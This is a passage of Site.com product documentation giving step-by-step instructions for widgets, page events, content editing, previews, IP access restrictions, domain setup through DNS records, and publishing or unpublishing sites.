existing Site.com page elements, such as panels, content blocks, custom code, or data repeaters, you can create widgets to suit
your unique requirements. And by using CSS to style the widget, you can ensure it always appears correctly whenever it’s
added to site pages or page templates. You can even add a widget to another widget!

With widgets, you can:

• Minimize duplication in your site. You just build once, then reuse.

• Reduce maintenance overheads for you and your team. Any updates you make to a widget are automatically reflected in
copies of the widget on the page.

• Improve the load time of your pages.

When you create a widget, it’s added to the Widgets view on the Overview tab, where you can access and manage all of the
site’s widgets. Additionally, when you make it available for use, the widget is added to the Widgets section of the Page Elements
tab, where other site administrators and designers can easily drag it onto the page.

Widget Examples

Let’s look at some examples of how you can take advantage of widgets. You could use the custom code page element to create
reusable social plug-in widgets, such as Like or Follow buttons from Facebook, or a Twitter feed, for example.

Alternatively, to ensure a consistent look and feel across all of your pages, you could create a corporate header such as this
sample header widget. It consists of a panel (1) that contains a company logo (2) and a menu (3). The widget also contains
another widget (4) that’s comprised of a panel containing custom code for Facebook, Twitter, and RSS plug-ins.
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Tips for Creating Widgets

• When you add a widget to a page, it creates a copy or “instance” of the widget. You can’t edit this copy; you must edit the
widget directly. When you update the widget, every copy is also automatically updated.

• Wherever possible, use widgets to reduce duplication in your site design. This is particularly important when working with
complex designs or site elements, where maintenance can be time consuming.

• Use widgets to store commonly used pieces of text, such as company names, addresses, legal text, and so on. Simply create
a widget that contains a content block with the relevant text.

• When using CSS to style widgets, add the styles to the Site Style Sheet, which is the site’s global style sheet. Because every
page automatically references the style sheet, you can ensure that each widget will appear correctly on the page.

• You can add a widget to another widget.
• If you plan to use the same widgets across several sites, consider creating a basic site to contain all the required widgets.

Then, for each new site, just create a copy of that basic site. That way, each new site automatically includes all of the widgets
you created.

See Also:
Creating Widgets
Editing and Deleting Widgets

Creating Widgets
Widgets let you create custom, reusable page elements by combining existing Site.com page elements, custom code, and CSS.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:
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When you create a widget, it’s added to the Widgets view on the Overview tab, where you can access and manage all of the
site’s widgets. If you make it available, the widget also appears in the Widgets section of the Page Elements tab, where you
and your team can easily drag it onto the page.

1. Hover over Widgets on the Overview tab and click New, or click New Widget when the Widgets view is open.
2. Enter the widget name. This is name that appears in the Page Elements pane.
3. Optionally, add a description.
4. To add a display icon for the widget, select an image from your imported assets. The icon should be 16 x 16 pixels in size.
5. Deselect Available in the Page Elements pane if you don’t want the widget to appear in the Page Elements

pane.

For example, you may not want the widget to appear until you’ve finished building it.

6. Click Apply. Now you’re ready to add page elements to the widget.
7. Click the widget’s name to open it in a new tab.
8. Add the page elements and CSS styles you need.

After you finish building the widget, ensure it’s available in the Page Elements tab by selecting Available in Page
Elements Pane on the Properties pane.

See Also:
Widgets Overview
Editing and Deleting Widgets
Adding Site.com Page Elements
Cascading Style Sheets Overview

Editing and Deleting Widgets
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Access the site’s widgets in the Widgets view under All Site Content (on the Overview tab).

To update a widget, hover over it and click . From the  menu, you can:

• Edit the widget. When you edit a widget, it opens in a new tab. Any updates you make are reflected immediately in the
site pages or page templates that reference it.

• Update the widget’s name, description, display icon, or availability in the Page Elements pane. In the Widgets view, you
can also edit the name, description, or availability inline by double-clicking the item.
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• Duplicate, preview, or delete the widget. You can’t delete a widget if it’s being used on a site page, page template, or another
widget.

See Also:
Widgets Overview
Creating Widgets

USING EVENTS TO CREATE ANIMATED EFFECTS

Events Overview
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Events enable you to add interactive and animated effects to the pages and page elements of your website.

When an event occurs—say, when a user clicks an element on the page or when the page loads—you can specify what action
(or series of actions) it should trigger. For example, when your home page loads, you could display a news bulletin popup that
fades away after several seconds. Or when the user clicks a panel, you could expand the panel to reveal additional information
or alter its style.

The Events pane lists many common actions that you can trigger when an event occurs. Using the options here, you can specify
that:

When [this event] occurs, trigger [this action].

See Also:
Creating an Event
Available Events and Actions
Using Site.com Studio as a Site Administrator or Designer
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Creating an Event
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Use events to add interactive and animated effects to the pages and page elements of your website.

1. Select the relevant page or page element.
2. Select an event in the Events pane. See Available Events and Actions on page 3408.

3. Click  and select an action in the Choose an Action list that appears.
4. Set the other available properties for the action, such as:

• Target Element—specifies the page element that the action affects
• Effect—specifies how the action is animated, such as fade or slide.
• Speed—sets the speed of the animation to fast, normal, slow, or very slow
• Chained—allows you to chain actions so they occur sequentially. For example, to create a Delay action that delays the

action that follows it, select the Delay action's Chained checkbox. This indents the subsequent action underneath the
Delay action, indicating that it's tied to the Delay action. Applies to the Animate, Delay, Hide Element, Repeat, Show
Element, and Toggle Element actions.

5. Click Save.
6. Add more actions if required.

Tip:

• When you add an event to a page or page element, an asterisk (*) appears beside the event in the Events pane.

• If you hover over  on a selected page element, a tooltip appears indicating which events are associated with the
element. You can also click the icon to quickly open the Events tab.

To delete an action, select it and click .
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To change the order in which an action occurs, select it and click  or .

See Also:
Adding Pagination to Data Repeaters and Data Tables
Events Overview

Available Events and Actions
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Choose from several event triggers and actions when you create an event.

When This Event Occurs...

Occurs When...Event

The user double-clicks the page element.Double click

The user clicks the page element.Click

The focus moves to the page element.Focus

The page or page element is loaded in a browser window.Load

The focus moves from the page element.Blur

The user moves the mouse pointer over the page element.Mouse in

The user moves the mouse pointer out of the page element.Mouse out

Trigger This Action...

DescriptionAction

Dynamically adds a CSS class to style the targeted item. For example, to alter the appearance of
a page element, you could add a new CSS class to it.

Add CSS Class

Displays a popup browser alert message.Alert

Animates CSS properties, such as Top, Left, Width, and Height, which you specify by entering
appropriate values in the CSS field.

For example, if targeting an image, you can enter values such as opacity: "0.4", width:
"70%", which changes the image's appearance according to the speed and effect you set.

Animate

Adds a delay (measured in milliseconds) before the action that follows. (Ensure you select the
Chained checkbox to tie it to the subsequent action.)

Delay
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DescriptionAction

Runs custom JavaScript code, which you enter by clicking Edit Script to open the Custom Code
Editor.

Execute JavaScript

Goes to the designated page number in data repeaters and data tables. See Adding Pagination to
Data Repeaters and Data Tables on page 3378.

Go To Page

Hides the targeted item according to the speed and effect you set.Hide Element

Goes to the next page in data repeaters and data tables. See Adding Pagination to Data Repeaters
and Data Tables on page 3378.

Next Page

Goes to the previous page in data repeaters and data tables. See Adding Pagination to Data
Repeaters and Data Tables on page 3378.

Previous Page

Removes a CSS class from the targeted item to dynamically remove its style. For example, to alter
the appearance of a page element, you could remove the CSS class associated with it and replace
it with another.

Remove CSS Class

Repeats the action that follows by the specified number of times, with the specified delay between
each occurrence. (Ensure you select the Chained checkbox in the Properties pane to tie it to the
following action.)

Repeat

Dynamically sets the specified attribute value of the targeted item. For example, if targeting an
image, you could change the image source by entering src in the Attribute Name field and

Set Element Attribute

entering the image URL in the Attribute Value field. You can also add custom name/value
pairs for advanced coding purposes.

Reveals the targeted item according to the speed and effect you set.Show Element

Submits the selected form's data.Submit

Switches the visibility of the targeted element according to the speed and effect you set.Toggle Element

See Also:
Adding Pagination to Data Repeaters and Data Tables
Events Overview
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EDITING SITE CONTENT

Creating Site Pages as a Site.com Contributor
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Contributor User field enabled on the user
detail page

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

If your site administrator or designer has enabled page creation, you can add pages to your site.

To add a new page:

1. In the Site Pages view on the Overview tab, click New Site Page.
2. Enter the page name.
3. Select a template for the page.
4. Click Create. The site page opens.

See Also:
Using Site.com Studio as a Contributor
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Editing Site.com Pages as a Contributor
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Contributor User field enabled on the user
detail page

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

Open a page in the Site Pages view on the Overview tab by double-clicking it or hovering over it and clicking  > Edit.
The page opens as a new tab.

Once open, you can:

• Edit the page text, and add images and hyperlinks by clicking Edit Content. The button isn't available if there are no
editable areas on the page.

• Import assets, such as images and files.

• Preview the page in a browser window.

See Also:
Creating Site Pages as a Site.com Contributor
The Content Editing Toolbar
Using Site.com Studio as a Contributor
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Editing Content Blocks
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Contributor User

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

Contributors, designers, and site administrators can edit content blocks, which contain the text for site pages, and can also
house images, videos, and hyperlinks. However, if you're a contributor and the Edit Content button is disabled, there are no
editable areas on the page.

When the page is open:

1. Click Edit Content.
2. Add or edit the text in the highlighted areas and format it using the content editing toolbar.

Tip:

• If you copy and paste text from Microsoft® Office, highlight the text and click  to remove any hidden
formatting, which can adversely affect how the text appears on the page.

• Avoid applying formatting, such as font family or size, directly to text whenever possible. Instead, it’s best
practice to use the paragraph and heading styles to quickly apply consistent formatting throughout the site.
This also ensures that all page text is updated automatically if a site administrator or designer modifies the
site's paragraph and heading styles.

3. Add images, videos, hyperlinks, or anchors as required.
4. Click Save.

Note: The content of all editable page elements on a child page or template is linked to the content of the editable
elements on its parent page template. When you update the content of an editable page element on the parent template,
the changes are pushed down to any child pages or page templates. However, if you modify the content of an editable
page element at the child page or template level, you break the link between the elements, and any subsequent changes
made to the page element on the parent template won't trickle down to its children.
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The Content Editing Toolbar
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Contributors, designers, and site administrators can edit content blocks, which contain the site page's text, along with images,
videos, and hyperlinks.

Using the content editing toolbar, you can:

• Undo and redo your edits, and remove the formatting of text copied and pasted from Microsoft® Office, which can often
include hidden formatting (1).

• Cut, copy, and paste text (2).

• Apply direct formatting (3), such as:

◊ Font family and size

◊ Bold, italic, underline, subscript, superscript, and strikethrough

◊ Font and highlight color

• Control the text style and layout (4) by:

◊ Applying paragraph and heading styles

◊ Setting paragraph indentation

◊ Left-aligning, centering, right-aligning, or justifying text

◊ Inserting numbered or bulleted lists

• Insert a table, and add rows, columns, and spacing (5).

• Add images, videos, and special characters (6).

• Add and remove hyperlinks and anchors (7).

Tip: Avoid applying formatting, such as font family or size, directly to text whenever possible. Instead, it’s best
practice to use the paragraph and heading styles to quickly apply consistent formatting throughout the site. This also
ensures that all page text is updated automatically if a site administrator or designer modifies the site's paragraph and
heading styles.
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Adding Images to Content Blocks
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Contributor User

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

Contributors, designers, and site administrators can add images to the content blocks of site pages. However, if you're a
contributor and the Edit Content button is disabled, there are no editable areas on the page.

When the page is open:

1. Click Edit Content.

2. Position your cursor where you want to insert the image and click .
3. In the Image Properties dialog box, either:

• Enter a URL to an image in the Image URL text box.
• Select an image from your website by clicking From Website and selecting the image in the list that appears.
• Upload an image from your computer by opening the Upload tab, browsing to the image, and clicking Upload.

4. Enter a brief description of the image in the Alternative text field. (The description is used by screen reader users
or as a substitute if the image doesn't display. It can also help with search engine optimization (SEO).

5. Optionally, preview how the image appears in relation to the text on the page and set:

• The width and height of the image
• How much space surrounds the image (which is controlled by the HSpace and VSpace properties)
• How it aligns with the text on the page
• The image border (for example, to set a dotted green border that's 10 pixels wide, you enter 10px dotted green

in the Border field)

6. Click Apply.
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7. Click Save.

See Also:
Editing Content Blocks
The Content Editing Toolbar
Importing and Managing Assets

Adding Video to Content Blocks
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Contributor User

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

Contributors, designers, and site administrators can add YouTube®, Google®, Adobe® Flash®, Windows Media®, and Apple
QuickTime® videos to the content blocks of site pages. However, if you're a contributor and the Edit Content button is
disabled, there are no editable areas on the page.

When the page is open:

1. Click Edit Content.

2. Position your cursor where you want to insert the video and click .
3. In the Video Properties dialog box, select the video type and either:

• Enter the URL to the video in the Video URL text box—for example,
http://www.youtube.com/watch?v=123abc.

• Select a video from your website by clicking From Website and selecting the video in the list that appears.
• Upload a video from your computer by opening the Upload tab, browsing to the image, and clicking Upload.

Note:  You can only select or upload Flash, Windows Media, and QuickTime videos.
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4. To specify how the video is displayed on the page, you can set:

• The width and height of the video
• How much space surrounds the video (which is controlled by the HSpace and VSpace properties)
• How it aligns with the text on the page

You can also preview the video.
5. Click Apply. The video appears as an icon in the content block.
6. Click Save.

Note:  You can view all video types, other than Windows Media videos, when you preview a page.

See Also:
Editing Content Blocks
The Content Editing Toolbar

Attaching Hyperlinks to Text and Images
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Contributor User

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

Contributors, designers, and site administrators can create hyperlinks to:

• External Web pages or websites

• Pages and assets in a site

• Email messages

• Anchors that were added to the page

However, if you're a contributor and there are no editable areas on the page, the Edit Content button is disabled.
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When the page is open:

1. Click Edit Content.

2. Select the text or image that you want to attach a hyperlink to and click .
3. Select the link type in the Link to drop-down list. To link to:

• A Web page:

a. Select A URL.
b. Type the address in the URL field—for example, http://www.externalsite.com.
c. Go to step 4.

• A page or item in your site:

a. Select An item in your site.
b. Select the item type, such as a page or image.
c. Select the item. (If you can’t see the list of items, place your cursor in the URL field and press the DOWN key on

your keyboard.)
d. Go to step 4.

• An anchor that you previously added to the page:

a. Select An anchor on the page.
b. Select the anchor in the drop-down list. Alternatively, enter a new anchor name and create the anchor afterwards.
c. Go to step 5.

• An email message:

a. Select An email.
b. Enter the recipient's email address and the message information.
c. Go to step 5.

Note:  If you’re a designer or site administrator working with a content block in a data repeater, you can use
expressions to add a custom link, such as a URL query string, to an item in your site or to a Web page.

4. To select which window the item should open in, select an option in the Target drop-down list:

• Popup window loads the item into a popup window. When you select this option, you can set the title for the popup
and control its appearance and size with the options that appear.

• New window (_blank) loads the item into a new, unnamed browser window.
• Same window (_self) loads the item into the same frame or window as the link. This is the default setting.
• Topmost window (_top) loads the item into the topmost parent frameset or window of the frame that contains the

link.
• Parent window (_parent) loads the item into the parent frameset or window of the frame that contains the link.

5. Optionally, enter a tooltip description for the link. The tooltip displays as a pop-up when the user hovers over the link.
6. Click Apply.
7. Click Save.
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To delete a hyperlink, select it and click .

See Also:
Editing Content Blocks
The Content Editing Toolbar

Adding an Anchor to a Page
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Contributor User

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

Anchors let you create hyperlinks that jump to specific locations on a page, which can be useful if a page is particularly long.
Contributors, designers, and site administrators can add anchors to page text. However, if you're a contributor and the Edit
Content button is disabled, there are no editable areas on the page.

When the page is open:

1. Click Edit Content.

2. Place the cursor in the required position and click .
3. Enter the anchor name and click Apply.
4. Create a hyperlink to the anchor.

See Also:
Attaching Hyperlinks to Text and Images
Editing Content Blocks
The Content Editing Toolbar
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Previewing Site.com Sites
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Contributor User

AND

Contributor role assigned at the site level

To edit only content in Site.com sites:

Contributors, designers, and site administrators can preview site pages to see how they look when rendered in a browser
window. It's always a good idea to make sure your changes are displayed correctly, as this is how the pages appear on the live
site.

If you're a site administrator or designer, you can also create an anonymous preview URL that allows other users to review the
site before it goes live. The URL is always valid (unless you disable it) and shows the latest work in progress. It’s only available
to the people you send it to, and can’t be found by search engines.

• Click Preview Page on the toolbar when editing a page.

• Hover over a page in the Site Pages view of the Overview tab and click  > Preview to view a single page.
• Click Preview on the toolbar of the Overview tab to view the entire site. From the Preview menu, you can also:

◊ Click Preview Site in a New Tab to view the site in a new tab in the existing browser window.

◊ Click Preview Site at 1024 x 768 to view the site as it appears to laptop users.

◊ Click Enable Anonymous Preview, if you're a site administrator or designer, to create a URL that allows other users
to preview the site before it goes live. Click the View Anonymous Preview option that appears in the Preview menu
to access the preview URL, which you can copy and send to other users to review and test your changes. Enable
Anonymous Preview is also available in the Site Configuration view.

• Click Preview beside a site on the Site.com home page to view the entire site.

When you preview pages, all browser-related functions should work.
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Note:  During preview only, style sheets are rendered as inline styles.

See Also:
Using Site.com Studio as a Site Administrator or Designer
Using Site.com Studio as a Contributor

CONTROLLING ACCESS USING IP RESTRICTIONS

IP Restrictions Overview
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Every computer has a unique IP address that it uses to identify itself. Using IP restrictions, you can define a range of permitted
IP addresses for the pages, folders, and assets in your site to control site visitors’ access.

For example, let’s say you have a site page that lists all employees by department. You don’t want people outside your organization
to view this sensitive information. By restricting the permitted IP addresses to your organization’s IP range—say, 112.122.0.1
to 112.122.0.123—you ensure that no other site visitors can view the page.

When you define IP restrictions for:

• A parent page template, all child page templates and template-based pages inherit the restrictions.

• A folder, all subfolders and assets within the folder inherit the restrictions.

• The entire site, all site items inherit the restrictions.

For any item that inherits IP restrictions, you can add additional IP restrictions to further narrow the permitted IP range.

And if a user is denied access to a page, you can redirect them to another page, such as a user-friendly error page.

See Also:
Adding IP Restrictions
Editing, Disabling, and Deleting IP Restrictions
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Adding IP Restrictions
Control site visitors’ access to the pages, page templates, folders, and assets in your site by setting the range of permitted IP
addresses.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To add and edit IP restrictions in Site.com:

1. On the Overview tab, either:

• Hover over the page, page template, folder, or asset in the All Site Content view and click  > Add IP Restrictions.
• Click Site Configuration > IP Restrictions and click Add IP Restrictions.

2. If not already selected, choose the item you want to restrict access to.
3. Enter the first and last IP addresses of the permitted IP range—for example, 112.122.0.1 to 112.122.0.123. To enter a

single IP address, just complete the Start Address field.

Both IP addresses in a range must be either IPv4 or IPv6. In ranges, IPv4 addresses exist in the IPv4-mapped IPv6 address
space ::ffff:0:0 to ::ffff:ffff:ffff, where ::ffff:0:0 is 0.0.0.0 and ::ffff:ffff:ffff is 255.255.255.255. A range can’t include IP
addresses inside of the IPv4-mapped IPv6 address space if it also includes IP addresses outside of the IPv4-mapped IPv6
address space. Ranges such as 255.255.255.255 to ::1:0:0:0 or :: to ::1:0:0:0 are not allowed.

4. Click Add IP Range to add additional ranges.
5. To redirect users with an invalid IP address to an alternative page, such as a user-friendly error page, specify the page in

Access Denied Page. If you set this in the IP Restrictions view, the page is the default for all IP restrictions unless you
override it at the item level.

You can redirect users to a page in your site or to an external site. Always use a prefix such as http:// when entering an
external URL. If you don’t set an access denied page, users see a blank page that displays a default “Access to this resource
is denied” message.

6. Click Save.

To test the IP restrictions of a page template or site page, click Preview when the page is open. When you’re happy with your
updates, publish the site to enable the restrictions.

Note:

• If an item inherits IP restrictions—for example, an asset in an IP-restricted folder—you can add additional
restrictions to further narrow the range. Although the item doesn’t display the inherited values anywhere, the
inherited IP range values do apply to the child item and only site visitors with valid IP addresses can access it.
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• If you select a site page in the Access Denied Page drop-down list, users with an invalid IP address can view that
page even if the entire site is restricted.

• Caching is disabled for any item that has IP restrictions. Additionally, if you update the IP restrictions of an asset,
folder, or page, the system updates its URL in case proxy servers such as Akamai already cached the item.

See Also:
IP Restrictions Overview
Editing, Disabling, and Deleting IP Restrictions

Editing, Disabling, and Deleting IP Restrictions
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To add and edit IP restrictions in Site.com:

After you create an IP restriction, you can edit the address range, briefly disable the IP restriction (say, to allow temporary
access to a page), or delete the restriction entirely.

To view all the IP restrictions on a site, open the IP Restrictions view under Site Configuration (on the Overview tab).
Alternatively, to view the IP restriction on a single item, hover over it in the All Site Content view and click  > Edit IP
Restrictions.

When either the IP Restrictions section or the IP restrictions dialog box is open, you can:

• Edit the range of IP addresses. In the IP Restrictions view, double-click the IP address to edit the values inline.

• Disable an IP restriction by deactivating it. You can reactivate the restriction at any time. If you deactivate an IP restriction
on an item that has several restrictions, the item’s other restrictions are also deactivated.

• Delete an IP restriction. This removes the restriction entirely and allows all site visitors to access the item.

After you update the site’s IP restrictions, publish the site to enable your changes.

See Also:
IP Restrictions Overview
Adding IP Restrictions
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MANAGING DOMAINS AND LIVE SITES

Managing Domains in Site.com
Before you can publish your site to the Internet, you must set the site's domain information.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To manage domains and publish Site.com sites:

To add a domain to the site’s domains list, Salesforce must verify that you own the domain name. The verification method
you choose depends on whether the domain name is currently in use.

• Add domain names using CNAME records if you’re creating a new domain name or using a domain name that’s not
currently in use.

• Add domain names using TXT records if the domain name is already in use on another website and you want to reuse it.
The existing website must also use domain name system (DNS) A records.

See Also:
Publishing Site Changes
Taking a Site Offline
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Adding Domains Using CNAME Records in Site.com
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To manage domains and publish Site.com sites:

To publish a site to the Internet, you must first set its domain information. Add a domain name using a CNAME record if
you’re creating a new domain name, or if you’re adding a domain name that’s currently not in use.

If you don’t already have a branded, custom Web address, such as www.mycompany.com, create one by registering through
a domain name registrar.

Each domain name in Site.com must be unique. Salesforce verifies your domain name when you add it to the site’s list of
domains, and again when you publish the site.

Tip:  It can take up to 48 hours for domain changes to become available on the Internet. However, you can reduce
this time by lowering the time to live (TTL) value in the account management settings of your DNS provider. Because
the current remaining time must expire before your new setting takes effect, you should update this value a few days
prior to going live.

You can also add a custom path to your domain name to create a custom URL. A custom URL consists of the domain and a
custom path. The same path name may be used on more than one domain, but it can't be used more than once within the
same domain. When adding a domain, the / is required for the path. It indicates the root. You can add an additional custom
name after the /, but you must at least use the / to indicate the root. For example, if the domain name is
https://oursite.com and the path is /products, the site URL is https://oursite.com/products. If you added
the custom URL to the root, the URL would be https://oursite.com.

Note:  You can also manage domains and paths in Setup using Domain Management.

1. In the account management settings of your DNS provider, create a CNAME record that points your branded domain
and subdomain to the same name with a live.siteforce.com suffix. For example, www.mycompany.com must point
to www.mycompany.com.live.siteforce.com.

Contact your DNS provider if you’re unsure how to create a CNAME record.

2. When your CNAME record is available on the Internet, open Site.com Studio and click Site Configuration > Domains
on the Overview tab.

3. Enter the domain name in the text box provided—for example, www.mycompany.com—.
4. Add an optional path name.
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5. click Add.
6. Repeat for any additional domain names. For example, you might want to include common misspellings of the domain

name in case users make typing mistakes. You must create a corresponding unique CNAME record for each domain name.
You can add up to ten domain names.

7. When you’re ready to go live, publish the site.

Note:

• If you have an MX record set up for your domain’s mail service, the domain assigned to the MX record can’t be
the same as the domain you assign to your CNAME record. If you create a CNAME record using the same
domain as your MX record, your mail service will be disabled.

For example, if you have mydomain.com assigned to your MX record, and you want to use it for your CNAME
record, we recommend assigning www.mydomain.com to your CNAME record instead, and then working with
your DNS provider to redirect mydomain.com to www.mydomain.com.

• When you update existing domain information, you must publish your changes for them to take effect. If you see
a message that there are no changes to publish, first update a page in your site and then publish your changes.

See Also:
Adding Domains Using TXT Records in Site.com
Managing Domains in Site.com

Adding Domains Using TXT Records in Site.com
To publish a site to the Internet, you must first set its domain information. Add a domain name using a TXT record if you’re
reusing a domain name that’s currently in use. For example, if you’re migrating from an existing site to a new Site.com site,
you can transition seamlessly to the new site when you’re ready to go live. This method is suitable only for existing sites that
use DNS A records.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To manage domains and publish Site.com sites:

Each domain name in Site.com must be unique. Salesforce verifies your domain name when you add it to the site’s list of
domains, and again when you publish the site.
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Tip:  It can take up to 48 hours for domain changes to become available on the Internet. However, you can reduce
this time by lowering the time to live (TTL) value in the account management settings of your DNS provider. Because
the current remaining time must expire before your new setting takes effect, you should update this value a few days
prior to going live.

1. In the account management settings of your DNS provider, create a TXT record that contains your organization’s ID. To
find the ID, open Site.com Studio, click Site Configuration > Domains on the Overview tab, and copy the organization
ID displayed there.

Contact your DNS provider if you’re unsure how to create a TXT record.

2. When your TXT record is available on the Internet, enter the domain name in the text box provided in the Domains
view—for example, www.mycompany.com—and click Add.

3. Repeat for any additional domain names. For example, you might want to include common misspellings of the domain
name in case users make typing mistakes.

You can add up to ten domain names.

4. Publish your Site.com site when it’s ready. It won’t yet be live on the Internet.
5. To go live, in your DNS account management settings:

a. Create a CNAME record that points your branded domain and subdomain to the same name with a
live.siteforce.com suffix. For example, www.mycompany.com must point to
www.mycompany.com.live.siteforce.com.

You must create a corresponding unique CNAME record for each domain name.

b. Delete the old A record, and also the TXT record you created in step 1.

See Also:
Adding Domains Using CNAME Records in Site.com
Managing Domains in Site.com

Publishing and Managing Live Sites
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To manage domains and publish Site.com sites:

When you publish a site in Site.com, you make its pages and assets live on the Internet so site visitors can access them.
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Before you publish your site for the first time, you must set the site's domain information. If you don't set up your domain,
you’ll be prompted to do so during the publishing process. After your domain is set up, you can publish your entire site or just
parts of it.

When working with a site, you can:

• Publish site changes.

• Review the publishing history.

• Take the site offline to remove it from public view.

Note:

You can’t publish your site from sandbox.

See Also:
Using Site.com Studio as a Site Administrator or Designer

Publishing Site Changes
When you publish a site in Site.com, you make its pages and assets live on the Internet so site visitors can access them.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To manage domains and publish Site.com sites:

Before you publish your site for the first time, you must set the site's domain information. If you don't set up your domain,
you’ll be prompted to do so during the publishing process.

You can publish your entire site or just specific items.

1. Click Publish Changes....
2. To publish:

• All recent changes, ensure Site-wide changes is selected.
• Specific items, select Only selected items and select the relevant items.

Note: If you select an item that has dependencies, the dependent items are also selected. For example, if you
select a page, but you actually changed both the page and the style sheet it relies on, the style sheet is also
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automatically selected. Click View to see the list of dependencies. If you can’t deselect an item, it means it’s a
critical dependency for another selected item.

3. Click Next and review the list of items to be published.
4. Click Next and add a publishing note, if required. The note appears in the Description column of the Publish History

view.
5. Click Publish.

You’ll receive an email notification when your site changes go live.

Note:

You can’t publish your site from sandbox.

See Also:
Publishing and Managing Live Sites
Viewing Publishing History
Taking a Site Offline

Viewing Publishing History
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To manage domains and publish Site.com sites:

In the Publish History view on the Overview tab:

• View a list of recently published changes, including the date and who submitted the change.

• Read the publishing notes under Description.

• View detailed information about each submission by clicking  > View Details.

See Also:
Publishing and Managing Live Sites
Publishing Site Changes
Taking a Site Offline
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Taking a Site Offline
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator role assigned at the site level

To manage domains and publish Site.com sites:

1. On the Overview tab, click Site Configuration > Domains.
2. Delete all listed domains.

When you remove the last domain, the site goes offline immediately. Site visitors see a “Server not found” message or
similar in their browser when they attempt to view the site.

3. In the popup window that appears:

• Click OK to unpublish the site. Unpublishing the site releases the Site.com Published Site license associated with it,
so you can use it to publish another site.

• Click Cancel if you don’t want to release the Site.com Published Site license—for example, if you plan to make the
site publicly available again at a later date.

If you change your mind after clicking Cancel, you can release the license by clicking Unpublish on the Overview tab.
After a site is unpublished, the Unpublish button is replaced with the Publish button.

4. If you don’t plan to reuse the domain with Site.com, remove any CNAME records that point to
your_domain_name.live.siteforce.com in the account management settings of your DNS provider.

After you unpublish a site, you can delete it from the list of sites on the Site.com tab.

See Also:
Managing Domains in Site.com
Publishing Site Changes
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FORCE.COM SITES

Force.com Sites Overview
Available in: Developer, Enterprise, and Unlimited Editions

Salesforce organizations contain valuable information about partners, solutions, products, users, ideas, and other business data.
Some of this information would be useful to people outside your organization, but only users with the right access and
permissions can view and use it. In the past, to make this data available to the general public, you had to set up a Web server,
create custom Web pages (JSP, PHP, or other), and perform API integration between your site and your organization.
Additionally, if you wanted to collect information using a Web form, you had to program your pages to perform data validation.

